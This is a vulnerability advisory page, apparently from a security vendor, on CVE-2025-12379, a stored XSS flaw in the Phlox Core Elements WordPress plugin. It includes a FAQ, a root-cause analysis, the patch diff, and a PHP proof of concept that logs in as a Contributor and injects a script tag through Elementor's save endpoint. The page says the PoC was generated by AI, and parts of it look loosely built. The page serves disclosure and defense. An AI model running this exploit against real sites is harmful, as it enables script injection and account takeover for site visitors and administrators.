What is CVE-2025-12379?

CVE-2025-12379 is a stored cross-site scripting (XSS) vulnerability in the Phlox Core Elements plugin for WordPress, affecting versions up to 2.17.13. It allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into pages that execute when viewed by other users.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization in the Modern Heading widget, specifically in the ‘title_tag’ and ‘title_tag_secondary’ parameters. Attackers can set these parameters to malicious scripts, which are then stored and executed in the context of any user who views the affected page.

Who is affected by CVE-2025-12379?

Any WordPress site using the Phlox Core Elements plugin version 2.17.13 or earlier is at risk. The vulnerability specifically affects authenticated users with Contributor-level access or higher, enabling them to exploit the flaw.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Phlox Core Elements plugin installed on your WordPress site. If it is version 2.17.13 or earlier, your site is susceptible to this vulnerability.

How can I fix CVE-2025-12379?

The vulnerability has been patched in version 2.17.14 of the Phlox Core Elements plugin. Updating to this version will mitigate the risk associated with CVE-2025-12379.

What is the severity level of this vulnerability?

CVE-2025-12379 has a CVSS score of 6.4, indicating a medium severity level. This means that while the vulnerability requires authenticated access to exploit, it can still lead to significant security risks if successfully executed.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can lead to stored XSS attacks, allowing attackers to steal session cookies, perform actions as the victim, or redirect users to malicious sites. The impact is particularly concerning if an administrator views the compromised content.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can log in as a Contributor, inject a malicious script into the ‘title_tag’ parameter of the Modern Heading widget, and trigger that script when other users view the page. This highlights the ease of exploitation given the necessary access.

What steps should I take after updating the plugin?

After updating the plugin, review user roles and permissions to ensure that only trusted users have Contributor-level access or higher. Additionally, monitor your site for any unusual activity that may indicate prior exploitation.

Is there a way to mitigate this vulnerability without updating?

While updating is the best solution, you can temporarily mitigate the risk by restricting access to the WordPress admin area, limiting Contributor-level access, and sanitizing user inputs in custom implementations until the plugin is updated.

How does this vulnerability relate to the CWE classification?

CVE-2025-12379 is classified under CWE-79, which refers to improper neutralization of input during web page generation. This classification indicates that the vulnerability stems from inadequate handling of user inputs in the web application.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Phlox Core Elements plugin temporarily to prevent exploitation. Inform your users about potential risks and monitor the site closely for any signs of compromise.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12379: Shortcodes and extra features for Phlox theme <= 2.17.13 – Authenticated (Contributor+) Stored Cross-Site Scripting via Modern Heading Widget (auxin-elements)

CVE ID CVE-2025-12379

Plugin auxin-elements

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.17.13

Patched Version 2.17.14

Disclosed January 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12379:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Phlox Core Elements plugin. The vulnerability exists in the Modern Heading widget for Elementor. Attackers with Contributor-level or higher WordPress access can inject arbitrary JavaScript that executes when other users view the compromised page. The CVSS score of 6.4 reflects the medium severity of this authenticated attack.

The root cause is insufficient input validation for the ‘title_tag’ and ‘title_tag_secondary’ parameters in the Modern Heading widget. The vulnerable code resides in the `auxin-elements/includes/elementor/widgets/heading-modern.php` file. The `render()` method, starting at line 1156, directly uses user-supplied values from the widget settings to construct HTML output without verifying they are safe HTML tags. The widget’s control definitions for these parameters, at lines 139-157 and 289-307, provide a dropdown of allowed tags but do not enforce this list during rendering.

Exploitation requires an authenticated user with at least Contributor privileges to edit a post or page using the Elementor page builder. The attacker adds a Modern Heading widget and sets its ‘HTML Tag’ or ‘Secondary HTML Tag’ parameter to a malicious string containing a JavaScript payload, such as `alert(document.domain)`. When the page is saved and subsequently viewed by any user, the malicious script executes in the victim’s browser context.

The patch introduces server-side validation in the `render()` method. The developer added a class property `$allowed_tags` defining a safe list of HTML elements. Before output, the code at lines 1156 and 1158 checks if the user-provided `title_tag` and `title_tag_secondary` values exist in this allowed list. If a value is not in the list, it defaults to ‘h2’ or ‘h3’. This validation prevents attackers from injecting arbitrary tag names, including script tags, into the final page HTML.

Successful exploitation leads to stored XSS. An attacker can steal session cookies, perform actions as the victim, deface the site, or redirect users to malicious domains. The impact is limited to the security context of the affected page, but it can facilitate account takeover, especially if an administrator views the compromised content.

Differential between vulnerable and patched code

Code Diff

--- a/auxin-elements/auxin-elements.php
+++ b/auxin-elements/auxin-elements.php
@@ -12,7 +12,7 @@
  * Plugin Name:       Phlox Core Elements
  * Plugin URI:        https://wordpress.org/plugins/auxin-elements/
  * Description:       Exclusive and comprehensive plugin that extends the functionality of Phlox theme by adding new Elements, widgets and options.
- * Version:           2.17.13
+ * Version:           2.17.14
  * Author:            By Averta
  * Author URI:        http://averta.net
  * Text Domain:       auxin-elements
--- a/auxin-elements/includes/classes/class-auxels-search-post-type.php
+++ b/auxin-elements/includes/classes/class-auxels-search-post-type.php
@@ -81,7 +81,8 @@
             's'                 => $this->s,
             'post_type'         => $this->post_type,
             'no_found_rows'     => 1,
-            'posts_per_page'    => $this->per_page
+            'posts_per_page'    => $this->per_page,
+            'post_status'       => 'publish'
         );

         // Get category slug for each post type
--- a/auxin-elements/includes/define.php
+++ b/auxin-elements/includes/define.php
@@ -12,7 +12,7 @@
 }


-define( 'AUXELS_VERSION'        , '2.17.13' );
+define( 'AUXELS_VERSION'        , '2.17.14' );

 define( 'AUXELS_SLUG'           , 'auxin-elements' );

--- a/auxin-elements/includes/elementor/widgets/heading-modern.php
+++ b/auxin-elements/includes/elementor/widgets/heading-modern.php
@@ -25,6 +25,18 @@
  */
 class ModernHeading extends Widget_Base {

+    public $allowed_tags = [
+        'h1'   => 'H1',
+        'h2'   => 'H2',
+        'h3'   => 'H3',
+        'h4'   => 'H4',
+        'h5'   => 'H5',
+        'h6'   => 'H6',
+        'div'  => 'div',
+        'span' => 'span',
+        'p'    => 'p'
+    ];
+
     /**
      * Get widget name.
      *
@@ -139,17 +151,7 @@
             array(
                 'label'   => __( 'HTML Tag', 'auxin-elements' ),
                 'type'    => Controls_Manager::SELECT,
-                'options' => array(
-					'h1'   => 'H1',
-					'h2'   => 'H2',
-					'h3'   => 'H3',
-					'h4'   => 'H4',
-					'h5'   => 'H5',
-					'h6'   => 'H6',
-					'div'  => 'div',
-					'span' => 'span',
-					'p'    => 'p'
-                ),
+                'options' => $this->allowed_tags,
                 'default'   => 'h2',
             )
         );
@@ -289,17 +291,7 @@
             array(
                 'label'   => __( 'HTML Tag', 'auxin-elements' ),
                 'type'    => Controls_Manager::SELECT,
-                'options' => array(
-					'h1'   => 'H1',
-					'h2'   => 'H2',
-					'h3'   => 'H3',
-					'h4'   => 'H4',
-					'h5'   => 'H5',
-					'h6'   => 'H6',
-					'div'  => 'div',
-					'span' => 'span',
-					'p'    => 'p'
-                ),
+                'options' => $this->allowed_tags,
                 'default'   => 'h3'
             )
         );
@@ -1164,6 +1156,10 @@

         $settings = $this->get_settings_for_display();

+        $settings['title_tag'] = in_array( $settings['title_tag'], $this->allowed_tags ) ? $settings['title_tag'] : 'h2';
+
+        $settings['title_tag_secondary'] = in_array( $settings['title_tag_secondary'], $this->allowed_tags ) ? $settings['title_tag_secondary'] : 'h3';
+
         $divider_markup  = auxin_is_true( $settings['divider'] ) ? '<div class="aux-modern-heading-divider"></div>' : '';

         echo '<section class="aux-widget-modern-heading">

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12379 - Shortcodes and extra features for Phlox theme <= 2.17.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via Modern Heading Widget
<?php

$target_url = 'http://vulnerable-site.local/wp-admin/admin-ajax.php';
$username = 'contributor';
$password = 'password';
$post_id = 1; // ID of the post/page to edit

// Payload to inject into the title_tag parameter
$malicious_tag = '<script>alert("Atomic Edge XSS: "+document.domain)</script>';

// Initialize cURL session for login
$ch = curl_init();

// Step 1: Get login nonce and cookies
$login_page_url = 'http://vulnerable-site.local/wp-login.php';
curl_setopt($ch, CURLOPT_URL, $login_page_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);

// Step 2: Extract the login nonce (wp-login.php form)
preg_match('/name="log"[^>]*>/', $response, $matches); // Simple pattern, adjust if needed

// Step 3: Perform WordPress login
$login_data = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'http://vulnerable-site.local/wp-admin/',
    'testcookie' => '1'
]);

curl_setopt($ch, CURLOPT_URL, $login_page_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 4: Verify login success by checking for dashboard in response
if (strpos($response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Step 5: Exploit the Elementor editor AJAX endpoint to save a widget with malicious tag.
// This simulates saving a post via Elementor's AJAX handler with a malicious Modern Heading widget.
$exploit_data = [
    'action' => 'elementor_ajax',
    'actions' => json_encode([
        'save_builder' => [
            'action' => 'save_builder',
            'data' => [
                'editor_post_id' => $post_id,
                'status' => 'publish',
                'elements' => [
                    [
                        'id' => 'some_id',
                        'elType' => 'widget',
                        'settings' => [
                            'title_tag' => $malicious_tag, // Injected payload
                            'title' => 'Test Heading'
                        ],
                        'widgetType' => 'aux-modern-heading'
                    ]
                ]
            ]
        ]
    ])
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);
$response = curl_exec($ch);

echo 'Exploit attempt completed. Response: ' . $response . "n";

// Step 6: Cleanup
curl_close($ch);
unlink('cookies.txt');

?>

Frequently Asked Questions

What is CVE-2025-12379?
Overview of the vulnerability
CVE-2025-12379 is a stored cross-site scripting (XSS) vulnerability in the Phlox Core Elements plugin for WordPress, affecting versions up to 2.17.13. It allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into pages that execute when viewed by other users.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization in the Modern Heading widget, specifically in the ‘title_tag’ and ‘title_tag_secondary’ parameters. Attackers can set these parameters to malicious scripts, which are then stored and executed in the context of any user who views the affected page.
Who is affected by CVE-2025-12379?
Identifying affected users
Any WordPress site using the Phlox Core Elements plugin version 2.17.13 or earlier is at risk. The vulnerability specifically affects authenticated users with Contributor-level access or higher, enabling them to exploit the flaw.
How can I check if my site is vulnerable?
Steps to assess vulnerability
To check if your site is vulnerable, verify the version of the Phlox Core Elements plugin installed on your WordPress site. If it is version 2.17.13 or earlier, your site is susceptible to this vulnerability.
How can I fix CVE-2025-12379?
Updating the plugin
The vulnerability has been patched in version 2.17.14 of the Phlox Core Elements plugin. Updating to this version will mitigate the risk associated with CVE-2025-12379.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2025-12379 has a CVSS score of 6.4, indicating a medium severity level. This means that while the vulnerability requires authenticated access to exploit, it can still lead to significant security risks if successfully executed.
What are the practical risks of this vulnerability?
Potential impacts of exploitation
If exploited, this vulnerability can lead to stored XSS attacks, allowing attackers to steal session cookies, perform actions as the victim, or redirect users to malicious sites. The impact is particularly concerning if an administrator views the compromised content.
What does the proof of concept demonstrate?
Example of exploitation
The proof of concept illustrates how an attacker can log in as a Contributor, inject a malicious script into the ‘title_tag’ parameter of the Modern Heading widget, and trigger that script when other users view the page. This highlights the ease of exploitation given the necessary access.
What steps should I take after updating the plugin?
Post-update recommendations
After updating the plugin, review user roles and permissions to ensure that only trusted users have Contributor-level access or higher. Additionally, monitor your site for any unusual activity that may indicate prior exploitation.
Is there a way to mitigate this vulnerability without updating?
Temporary measures
While updating is the best solution, you can temporarily mitigate the risk by restricting access to the WordPress admin area, limiting Contributor-level access, and sanitizing user inputs in custom implementations until the plugin is updated.
How does this vulnerability relate to the CWE classification?
Understanding the coding error
CVE-2025-12379 is classified under CWE-79, which refers to improper neutralization of input during web page generation. This classification indicates that the vulnerability stems from inadequate handling of user inputs in the web application.
What should I do if I cannot update the plugin immediately?
Immediate actions to consider
If immediate updating is not possible, consider disabling the Phlox Core Elements plugin temporarily to prevent exploitation. Inform your users about potential risks and monitor the site closely for any signs of compromise.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations